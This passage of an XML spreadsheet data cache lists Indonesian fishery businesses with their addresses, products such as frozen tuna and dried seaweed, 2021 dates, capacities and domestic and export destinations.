    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25514"/>
    <x v="1186"/>
    <s v="CV. RAJA PATIN INDONESIA"/>
    <s v="Jl. Mesjid No.289, Kel. Sugiharjo Dusun II, Kec. Batang Kuis, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Keripik Kulit Patin, Keripik Kulit Nila"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="360000"/>
    <s v="Kabupaten Deli Serdang, Kota Medan, Kota Bandar Lampung, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25515"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Bernilai Tambah Beku (Bakso Salmon, Salmon Berlapis Tepung Beku, Burger Salmon) "/>
    <d v="2021-06-07T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang"/>
    <s v="Brunei Darussalam, Japan, Malaysia, Philippines, Saudi Arabia, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="25527"/>
    <x v="1187"/>
    <s v="RAMANTHA KITCHEN"/>
    <s v="Lingkungan II, Kel. Batuputih Bawah, Kec. Ranowulu, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Abon Ikan"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Pusat, Kota Bogor, Kota Surabaya, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25528"/>
    <x v="1187"/>
    <s v="RAMANTHA KITCHEN"/>
    <s v="Lingkungan II, Kel. Batuputih Bawah, Kec. Ranowulu, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sambal Roa"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Pusat, Kota Bogor, Kota Surabaya, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25531"/>
    <x v="1185"/>
    <s v="SIALANG CUPU GADING"/>
    <s v="Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Stik Ikan"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="120"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25542"/>
    <x v="1188"/>
    <s v="ZAHRA"/>
    <s v="BTN Pole Indah Mas, Jl.Mutiara Blok H 28, Kel. Darma, Kec. Polewali, Kabupaten Polewali Mandar&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Abon Ikan"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="1800"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Manado, Kota Makassar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="25543"/>
    <x v="1188"/>
    <s v="ZAHRA"/>
    <s v="BTN Pole Indah Mas, Jl.Mutiara Blok H 28, Kel. Darma, Kec. Polewali, Kabupaten Polewali Mandar&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Amplang Ikan"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Makassar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="25544"/>
    <x v="1189"/>
    <s v="PT. PANORAMA KEMAS INDAH"/>
    <s v="Kp. Pulau Nipah, Jembatan II, Kel. Pulau Setokok, Kec. Bulang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="6000000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="25545"/>
    <x v="1190"/>
    <s v="PT. BINTANG KARYA LAUT"/>
    <s v="Jl. Raya Rembang - Tuban Km 28, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Surimi Beku"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="12000000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25546"/>
    <x v="1190"/>
    <s v="PT. BINTANG KARYA LAUT"/>
    <s v="Jl. Raya Rembang - Tuban Km 28, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25547"/>
    <x v="1190"/>
    <s v="PT. BINTANG KARYA LAUT"/>
    <s v="Jl. Raya Rembang - Tuban Km 28, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Mata Besar, Malong, Kuniran, Kerapu, Layur, Coklatan, Seabream, Kapas-kapas, Kakap, Kurisi)"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25548"/>
    <x v="1190"/>
    <s v="PT. BINTANG KARYA LAUT"/>
    <s v="Jl. Raya Rembang - Tuban Km 28, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Makerel, Lemadang, Banjar, Layang, Tenggiri)"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25549"/>
    <x v="1191"/>
    <s v="PT. SUNRISE NIAGA FISHERY"/>
    <s v="Dusun Dermo No.89, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demesal Beku (Barramundi, Bawal Hitam, Lencam, Anggoli, Kakatua, Kakap Merah)"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="510000"/>
    <m/>
    <s v="France, United States"/>
  </r>
  <r>
    <n v="25550"/>
    <x v="1191"/>
    <s v="PT. SUNRISE NIAGA FISHERY"/>
    <s v="Dusun Dermo No.89, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-Cumi, Gurita, Sotong)"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="355000"/>
    <m/>
    <s v="France, United States"/>
  </r>
  <r>
    <n v="25551"/>
    <x v="1191"/>
    <s v="PT. SUNRISE NIAGA FISHERY"/>
    <s v="Dusun Dermo No.89, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="35000"/>
    <m/>
    <s v="France, Guadeloupe, United States"/>
  </r>
  <r>
    <n v="25552"/>
    <x v="1191"/>
    <s v="PT. SUNRISE NIAGA FISHERY"/>
    <s v="Dusun Dermo No.89, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Julung-julung, Lemadang, Marlin, Tenggiri)"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="35000"/>
    <m/>
    <s v="France, United Kingdom, United States"/>
  </r>
  <r>
    <n v="25553"/>
    <x v="1191"/>
    <s v="PT. SUNRISE NIAGA FISHERY"/>
    <s v="Dusun Dermo No.89, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng)"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="25554"/>
    <x v="1192"/>
    <s v="PT. KHOM FOODS"/>
    <s v="Jl. Muara Baru Ujung Blok I Kav V, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25555"/>
    <x v="1192"/>
    <s v="PT. KHOM FOODS"/>
    <s v="Jl. Muara Baru Ujung Blok I Kav V, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Bernilai Tambah Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25556"/>
    <x v="1193"/>
    <s v="POKLAHSAR KARYA LESTARI"/>
    <s v="Jl. Anyelir XII No.13 X Br. Dukuh, Kel. Dauh Peken, Kec. Tabanan, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Abon Ikan"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25557"/>
    <x v="1193"/>
    <s v="POKLAHSAR KARYA LESTARI"/>
    <s v="Jl. Anyelir XII No.13 X Br. Dukuh, Kel. Dauh Peken, Kec. Tabanan, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Minuman Rumput Laut"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="10"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25558"/>
    <x v="1193"/>
    <s v="POKLAHSAR KARYA LESTARI"/>
    <s v="Jl. Anyelir XII No.13 X Br. Dukuh, Kel. Dauh Peken, Kec. Tabanan, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Pepes Ikan"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25559"/>
    <x v="1193"/>
    <s v="POKLAHSAR KARYA LESTARI"/>
    <s v="Jl. Anyelir XII No.13 X Br. Dukuh, Kel. Dauh Peken, Kec. Tabanan, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Snack Ikan"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="200"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25560"/>
    <x v="1193"/>
    <s v="POKLAHSAR KARYA LESTARI"/>
    <s v="Jl. Anyelir XII No.13 X Br. Dukuh, Kel. Dauh Peken, Kec. Tabanan, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Siomay Ikan, Kaki Naga, Otak-otak Ikan, Keong Mas, Sosis Ikan) "/>
    <d v="2021-04-30T00:00:00"/>
    <n v="1300"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25562"/>
    <x v="1194"/>
    <s v="ERSYA DAMAI"/>
    <s v="Lingkungan III, Kel. Meras, Kec. Bunaken, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Kayu"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="700"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25564"/>
    <x v="1194"/>
    <s v="ERSYA DAMAI"/>
    <s v="Lingkungan III, Kel. Meras, Kec. Bunaken, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Abon Ikan"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="350"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25565"/>
    <x v="625"/>
    <s v="PT. ANEKA SUMBER TATA BAHARI"/>
    <s v="Jl. Hurnala II, Kel. Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Daging Perut Tuna Beku"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Ambon"/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="25567"/>
    <x v="1195"/>
    <s v="KOPERASI PERIKANAN ARUMABAI"/>
    <s v="Kompleks PPP Goto, Kel, Goto, Kec, Tidore, Kota Tidore Kepulauan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Manado, Kota Bitung, Kota Makassar"/>
    <s v="Australia, Bangladesh, China, Germany, Hong Kong, India, Pakistan, Singapore, United Kingdom, United States"/>
  </r>
  <r>
    <n v="25568"/>
    <x v="1196"/>
    <s v="CV. MEKAR RAYA"/>
    <s v="Jl. Datuk Laksmana RT 01 RW 01, Kel. Tanjung Medang, Kec. Rupat Utara, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Segar"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25569"/>
    <x v="1196"/>
    <s v="CV. MEKAR RAYA"/>
    <s v="Jl. Datuk Laksmana RT 01 RW 01, Kel. Tanjung Medang, Kec. Rupat Utara, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25570"/>
    <x v="1196"/>
    <s v="CV. MEKAR RAYA"/>
    <s v="Jl. Datuk Laksmana RT 01 RW 01, Kel. Tanjung Medang, Kec. Rupat Utara, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Tongkol, Tenggiri)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25571"/>
    <x v="1196"/>
    <s v="CV. MEKAR RAYA"/>
    <s v="Jl. Datuk Laksmana RT 01 RW 01, Kel. Tanjung Medang, Kec. Rupat Utara, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Hidup (Betutu, Parang-parang)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25575"/>
    <x v="1197"/>
    <s v="MANDIRI USAHA BERSAMA"/>
    <s v="Dusun Harapan Jaya RT 04, Kel. Lalang Jaya, Kec. Manggar, Kabupaten Belitung Timur&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Kaki Naga, Otak-Otak Ikan, Pempek Ikan, Lumpia Ikan, Batagor Ikan)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="1386"/>
    <s v="Kabupaten Belitung Timur"/>
    <m/>
  </r>
  <r>
    <n v="25576"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25577"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25578"/>
    <x v="996"/>
    <s v="PT. MAQPRO BIOTECH INDONESIA"/>
    <s v="Jl. Raya Desa Jiken Blok I No. 8, Kel. Jiken, Kec. Tulangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Hidrolisat Udang"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kabupaten Pasuruan, Kabupaten Jombang"/>
    <s v="Australia, Bangladesh, Malaysia, Saudi Arabia, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25579"/>
    <x v="996"/>
    <s v="PT. MAQPRO BIOTECH INDONESIA"/>
    <s v="Jl. Raya Desa Jiken Blok I No. 8, Kel. Jiken, Kec. Tulangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Hidrolisat Ikan"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kabupaten Pasuruan, Kabupaten Jombang"/>
    <s v="Australia, Bangladesh, Malaysia, Saudi Arabia, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25585"/>
    <x v="284"/>
    <s v="BU SRI"/>
    <s v="Jl. Kuala Lempuing No.18, Kel. Lempuing, Kec. Ratu Agung, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Bandeng Presto"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="3600"/>
    <s v="Kabupaten Rejang Lebong, Kabupaten Lebong, Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="25586"/>
    <x v="1198"/>
    <s v="SUKIRMAN ALS TIEN SHE"/>
    <s v="Kp. Suka Maju RT 004 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Barakuda, Tongkol, Gabus Laut, Layang, Tenggiri)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="8650"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="25587"/>
    <x v="1198"/>
    <s v="SUKIRMAN ALS TIEN SHE"/>
    <s v="Kp. Suka Maju RT 004 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Kerapu, Talang-talang, Kakap, Parang-parang)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="8600"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="25589"/>
    <x v="1199"/>
    <s v="PT. BERKAT RASA FAJARINDO"/>
    <s v="Jl. Bisma Raya Blok D1 No.33, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="Australia, Hong Kong, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="25590"/>
    <x v="1200"/>
    <s v="KOPERASI JASA PERIKANAN NGUNGARE BAHARI TERNATE"/>
    <s v="Jl. Kepiting No.16 RT 002 RW 001, Kel. Dufa-dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Layur)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="64000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kota Manado, Kota Ternate"/>
    <s v="China, Egypt, India, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Morocco, Pakistan, Saudi Arabia, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25591"/>
    <x v="1200"/>
    <s v="KOPERASI JASA PERIKANAN NGUNGARE BAHARI TERNATE"/>
    <s v="Jl. Kepiting No.16 RT 002 RW 001, Kel. Dufa-dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Manado"/>
    <s v="China, Egypt, India, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Morocco, Pakistan, Saudi Arabia, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25592"/>
    <x v="1201"/>
    <s v="PT. CELEBES BERKAH NIAGA"/>
    <s v="Citra Sudiang Estate Blok A1 No. 33 Kel. Sudiang Raya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-05-20T00:00:00"/>
    <n v="48000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="25593"/>
    <x v="1202"/>
    <s v="UD. ANUGERAH"/>
    <s v="Jl. Ir. Sutami, Komplek Pergudangan Lantebung Blok A 11 No.9B, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="540000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="25594"/>
    <x v="1202"/>
    <s v="UD. ANUGERAH"/>
    <s v="Jl. Ir. Sutami, Komplek Pergudangan Lantebung Blok A 11 No.9B, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="50"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="25595"/>
    <x v="1202"/>
    <s v="UD. ANUGERAH"/>
    <s v="Jl. Ir. Sutami, Komplek Pergudangan Lantebung Blok A 11 No.9B, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Teripang Kering"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="25596"/>
    <x v="1202"/>
    <s v="UD. ANUGERAH"/>
    <s v="Jl. Ir. Sutam,i Komplek Pergudangan Lantebung Blok A 11 No.9B, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="25597"/>
    <x v="249"/>
    <s v="PT, SUMBER MINA SAMUDERA"/>
    <s v="Jl, Ikan Tuna IV No, 5 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="216000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25598"/>
    <x v="249"/>
    <s v="PT, SUMBER MINA SAMUDERA"/>
    <s v="Jl, Ikan Tuna IV No, 5 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Setan, Lemadang, Marlin, Meka, Gindara, Tenggiri)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25599"/>
    <x v="249"/>
    <s v="PT, SUMBER MINA SAMUDERA"/>
    <s v="Jl, Ikan Tuna IV No, 5 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25600"/>
    <x v="249"/>
    <s v="PT, SUMBER MINA SAMUDERA"/>
    <s v="Jl, Ikan Tuna IV No, 5 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Lencam, Kuwe, Anggoli, Kerapu, Layur, Kakap)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25603"/>
    <x v="1203"/>
    <s v="UD. SAMA JAYA"/>
    <s v="Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25604"/>
    <x v="1203"/>
    <s v="UD. SAMA JAYA"/>
    <s v="Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25605"/>
    <x v="1203"/>
    <s v="UD. SAMA JAYA"/>
    <s v="Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Deho, Kembung, Cakalang, Tenggiri)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="25606"/>
    <x v="1203"/>
    <s v="UD. SAMA JAYA"/>
    <s v="Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demesal Beku (Barramundi, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="25609"/>
    <x v="1204"/>
    <s v="OISHII"/>
    <s v="RT 001 RW 019, Kel. Aermadidi Atas, Kec. Aermadidi, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Naget Ikan)"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25612"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Chilled Pasteurized Tuna"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="10"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25614"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
